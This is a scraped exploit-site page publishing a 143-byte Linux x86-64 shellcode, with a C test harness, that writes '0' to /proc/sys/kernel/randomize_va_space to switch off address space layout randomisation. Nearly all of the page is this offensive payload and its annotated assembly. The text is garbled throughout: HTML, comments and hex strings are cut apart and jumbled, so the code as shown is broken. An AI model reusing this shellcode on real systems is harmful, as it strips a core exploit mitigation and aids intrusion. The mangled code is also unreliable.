linux/x86-64 Disable ASLR Security 143 bytes

Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD linux/x86-64 Disable ASLR Security ========================================

/* Title:  Linux/x86-64 - Disable Date:   2010-06-17 Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan Web:    http://shell-storm.org

! Dtabase of shellcodes http://www.shell

Description: ============ Address space layout randomization which involves randomly arranging including the base  of the executable stack, in a process's address

This shellcode disables the ASLR.

*/

#include &lt;stdio.h&gt;

char *SC = /*  open(&quot;/proc/sys/

&quot;x48x31xd2&quot; &quot;x48xbbxffxffxffxffx &quot;x48xc1xebx28&quot; &quot;x53&quot; &quot;x48xbbx7ax65x5fx76x &quot;x53&quot; &quot;x48xbbx2fx72x61x6ex &quot;x53&quot; &quot;x48xbbx73x2fx6bx65x &quot;x53&quot; &quot;x48xbbx2fx70x72x6fx &quot;x53&quot; &quot;x48x89xe7&quot; &quot;x66xbex41x04&quot; &quot;x66xbaxa4x01&quot; &quot;x48x31xc0&quot; &quot;xb0x02&quot; &quot;x0fx05&quot;

/* write(3, &quot;0 &quot;, 2) */

&quot;x48xbfxffxffxffxffx &quot;x48xc1xefx38&quot; &quot;x48xbbxffxffxffxffx &quot;x48xc1xebx30&quot; &quot;x53&quot; &quot;x48x89xe6&quot; &quot;x48xbaxffxffxffxffx &quot;x48xc1xeax38&quot; &quot;x48x31xc0&quot; &quot;xb0x01&quot; &quot;x0fx05&quot;

/* _exit(0) */

&quot;x48x31xff&quot; &quot;x48x31xc0&quot; &quot;xb0x3c&quot; &quot;x0fx05&quot;;

int main(void) { fprintf(stdout,&quot;Length: &quot;,strlen(SC)); (*(void(*)()) SC)(); return 0; }

# <a href='http://inj3ct0r.com/&

HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86-64 Disable ASLR Security 143 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ 143 bytes ==== ASLR Security - 143 bytes | http://twitter.com/shell_storm -storm.org/shellcode/ (ASLR) is a computer security technique the positions of key data areas, usually and position of libraries, heap, and space. kernel/randomize_va_space&quot;, O_WRONLY|O_CREAT|O_APPEND, 0644) */ // xor    %rdx,%rdx ffx61x63x65&quot;    // mov    $0x656361ffffffffff,%rbx // shr    $0x28,%rbx // push   %rbx 61x5fx73x70&quot;    // mov    $0x70735f61765f657a,%rbx // push   %rbx 64x6fx6dx69&quot;    // mov    $0x696d6f646e61722f,%rbx // push   %rbx 72x6ex65x6c&quot;    // mov    $0x6c656e72656b2f73,%rbx // push   %rbx 63x2fx73x79&quot;    // mov    $0x79732f636f72702f,%rbx // push   %rbx // mov    %rsp,%rdi // mov    $0x441,%si // mov    $0x1a4,%dx // xor    %rax,%rax // mov    $0x2,%al // syscall ffxffxffx03&quot;    // mov    $0x3ffffffffffffff,%rdi // shr    $0x38,%rdi ffxffx30x0a&quot;    // mov    $0xa30ffffffffffff,%rbx // shr    $0x30,%rbx // push   %rbx // mov    %rsp,%rsi ffxffxffx02&quot;    // mov    $0x2ffffffffffffff,%rdx // shr    $0x38,%rdx // xor    %rax,%rax // mov    $0x1,%al // syscall // xor    %rdi,%rdi // xor    %rax,%rax // mov    $0x3c,%al // syscall %d #039;>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20